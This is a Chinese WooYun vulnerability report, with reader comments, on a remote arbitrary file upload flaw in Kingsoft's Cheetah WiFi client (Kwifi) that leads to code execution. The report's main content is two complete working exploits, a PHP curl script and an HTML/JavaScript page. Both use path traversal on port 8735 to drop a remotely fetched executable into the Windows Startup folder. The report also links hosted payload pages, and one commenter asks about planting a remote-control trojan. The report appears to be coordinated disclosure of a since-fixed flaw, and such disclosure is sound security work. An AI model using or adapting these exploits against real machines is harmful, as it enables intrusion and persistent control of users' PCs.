当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072394

漏洞标题:金山某客户端应用远程文件上传导致命令执行,突破内外网控制PC机

相关厂商:金山网络

漏洞作者: itleaf

提交时间:2014-08-14 18:01

修复时间:2014-11-12 18:02

公开时间:2014-11-12 18:02

漏洞类型:远程代码执行

危害等级:中

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-14: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商已经确认,细节仅向厂商公开
2014-10-08: 细节向核心白帽子及相关领域专家公开
2014-10-18: 细节向普通白帽子公开
2014-10-28: 细节向实习白帽子公开
2014-11-12: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

闪电有没有?

详细说明:

漏洞程序:
Kwifi V4.0.140813 猎豹wifi最新版本
测试环境:
Windows 7 64bit
Kwifi V4.0.140813
Firefox 31.0
Chrome 36.0.1985.143 m
漏洞详情:
当猎豹wifi运行后会向外网开放8735端口(运行web),而其某接口存在漏洞导致任意文件上传,从而导致pc机沦陷。
http://target:8735/tool/#upload
http://target:8735/api/replypic 存在漏洞导致任意文件上传
漏洞危害:
默认装C盘 可以实现挂马,指定入侵,拓展大企业内网监控pc机等;
部分测试环境默认安装在D盘(wooyun工作人员测试时出现,我测试时无论是官网最新版本还是百度下载的猎豹wifi都装在C盘);

漏洞证明:

当kwifi外网环境时:

<?php 
 /**
 * Created by itleaf
 * Date: 2014-08-14
 * Name: Kwifi V4.0.140813 Remote File Upload Exploit
 * Blog: http://itleaf.duapp.com
 **/
function getIP(){
	if (isset($_SERVER)) {
		if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
		$realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
	} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
		$realip = $_SERVER['HTTP_CLIENT_IP'];
	} else {
		$realip = $_SERVER['REMOTE_ADDR'];
	}
	} else {
		if (getenv("HTTP_X_FORWARDED_FOR")) {
		$realip = getenv( "HTTP_X_FORWARDED_FOR");
	} elseif (getenv("HTTP_CLIENT_IP")) {
		$realip = getenv("HTTP_CLIENT_IP");
	} else {
		$realip = getenv("REMOTE_ADDR");
		}
	}
	return $realip;
}
	$ip=$_GET["ip"];
	$ch = curl_init(); 
    $post=array('filename' => '@'.realpath('cmd.exe'));  //POST提交内容  
    $url = "http://".$ip.":8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088"; //上传地址  
   // $url = "http://".getIP()":8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088"; //上传地址  
     
    curl_setopt($ch, CURLOPT_URL, $url);//URL  
	curl_setopt($ch, CURLOPT_REFERER, "http://".$ip.":8735/tool/");
    curl_setopt($ch, CURLOPT_POST, 1);  //模拟POST  
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);//POST内容  
	curl_exec($ch);  
    curl_close($ch);  
	//echo getIP();
?>


当kwifi为内网环境时:
firefox 和google chrome下有效

<!DOCTYPE html> 
	<html> 
	<head>
	<title>Kwifi Remote File Upload Exploit</title>
	<meta charset=utf-8 />
	<link href='css.css' rel='stylesheet' type='text/css'> 
	<script src="jquery.min.js" type="text/javascript"></script>
	<style>
	body {background: #333; color: #eee; font-family: 'Inconsolata', Verdana, sans-serif;}
	a:link {color: green; }
	a:visited {color: darkgreen;}
	</style>
	</head>
	<body>
	<h1>Kwifi V4.0.140813 Remote File Upload Exploit</h1>
	
	<!-- <h2>Step 2</h2>
	<button type="button" id="upload" onclick="start()"><font size="+2">Let's have some fun!</font></button> -->
	<script>
	var logUrl = 'http://192.168.1.103:8735/api/replypic?name=../../../../../../ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup/cmd.exe&size=345088';
	function byteValue(x) {
    return x.charCodeAt(0) & 0xff;
	}
	function toBytes(datastr) {
    var ords = Array.prototype.map.call(datastr, byteValue);
    var ui8a = new Uint8Array(ords);
    return ui8a.buffer;
	}
	if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
	XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
	this.send(toBytes(datastr));
	}
	}
	function fileUpload(fileData, fileName) {
	var fileSize = fileData.length,
	boundary = "9849436581144108930470211272",
	uri = logUrl,
	xhr = new XMLHttpRequest();
	
	var fileFieldName = "filedata";
	
	xhr.open("POST", uri, true);
	xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); // simulate a file MIME POST request.
	xhr.setRequestHeader("Content-Length", fileSize);
	xhr.withCredentials = "true";
	
	xhr.onreadystatechange = function() {
   
	if (xhr.readyState == 4) {
	if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
	
	if (xhr.responseText != "") {
	alert(JSON.parse(xhr.responseText).msg); // display response.
	}
	} else if (xhr.status == 0) {
	$("#goto").show();
	}
	}
	}
	
	var body = "";
	body += addFileField(fileFieldName, fileData, fileName, boundary);
	body += "--" + boundary + "--";
	xhr.sendAsBinary(body);
	return true;
	}
	function addField(name, value, boundary) {
	var c = "--" + boundary + "\r\n"
	c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
	c += value + "\r\n";
	return c;
	}
	function addFileField(name, value, filename, boundary) {
    var c = "--" + boundary + "\r\n"
    c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
    c += "Content-Type: application/octet-stream\r\n\r\n";
    c += value + "\r\n";
    return c;	
	}
	function load_binary_resource(url) {
	var req = new XMLHttpRequest();
	req.open('GET', url, false);
	//XHR binary charset opt by Marcus Granado 2006 [http://mgran.blogspot.com]
	req.overrideMimeType('text/plain; charset=x-user-defined');
	req.send(null);
	if (req.status != 200) return '';
	var bytes = Array.prototype.map.call(req.responseText, byteValue);
	try{
	return String.fromCharCode.apply(this,bytes);
	}catch(e){
	return req.responseText;
	}
	
	}
	var start = function() {
	var c = load_binary_resource('cmd.exe');
	fileUpload(c, 'cmd.exe');
	};
	start();
	</script>
	</div>
	<div id="goto" style="display:none">
	<h2>Well Done</h2>
	
	</div>
	</body>
	</html>

修复方案:

视频:http://qin1u.qiniudn.com/kwifi.wmv
演示个cmd,上马过金山等也是可以的~
下面给一个通用型测试payload:
若安装到c盘,则开启wifi后访问下述链接,安装cmd.exe程序到系统启动项
http://xssae.sinaapp.com/kwifi/2.html
若安装到d盘,则开启wifi后访问下述链接,安装cmd.exe程序到d盘根目录
http://xssae.sinaapp.com/kwifi/3.html

版权声明:转载请注明来源 itleaf@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-14 19:53

厂商回复:

非常感谢您的提交

最新状态:

2014-11-12:已经修复

2014-11-12:漏洞已修复

漏洞评价:

评论

  1. 2014-08-14 18:12 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    好屌的样子。

  2. 2014-08-14 18:13 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    @zeracker 我想要闪电

  3. 2014-08-14 18:31 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @itleaf 雷劈了

  4. 2014-08-14 18:34 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    @疯狗 劈得好啊

  5. 2014-08-14 18:38 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @itleaf 有票了

  6. 2014-08-14 18:50 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人,可能走的过程...)

    闪电

  7. 2014-08-14 19:04 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    关注

  8. 2014-08-14 19:49 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    关注,膜拜

  9. 2014-08-14 21:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    赞厂商

  10. 2014-08-14 21:23 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    @xsser 怎么说

  11. 2014-08-15 13:08 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    厂商最新版已经修复,百度搜索下载任有效,安装到D盘,请删除D盘Program Files (x86)文件夹或在虚拟机里测试,win7 64bit firefox chrome测试成功,exp自行按需更改

  12. 2014-11-12 19:06 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    。。不明白CMD哪来的你说的上传也没见上传CMD啊

  13. 2014-11-12 19:27 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    @大白菜 cmd是远程调用的

  14. 2014-11-12 19:42 | 萌萌哒-花粉 ( 路人 | Rank:4 漏洞数:5 | 多乌云 多美女 花粉 顾名思义 就是校花班花...)

    金山 我喜欢这厂商 虽然和我想不不一样 但是的确很刁 值得学习

  15. 2014-11-12 20:27 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    @大白菜在script有下面这段代码 var start = function() { var c = load_binary_resource('cmd.exe'); fileUpload(c, 'cmd.exe'); }; start();先用ajax的方式远程读取cmd.exe再上传cmd.exe地址http://xssae.sinaapp.com/kwifi/cmd.exe

  16. 2014-11-13 00:02 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    @1c3z ...那能执行添加用户的命令吗?或者开3389 或者执行远程木马

  17. 2014-11-13 11:08 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    @大白菜 安装cmd.exe程序到系统启动项ProgramData/Microsoft/Windows/Start%20Menu/Programs/Startup开机自启动

  18. 2014-11-13 14:37 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    @1c3z 。。。能安装cmd远控木马吗?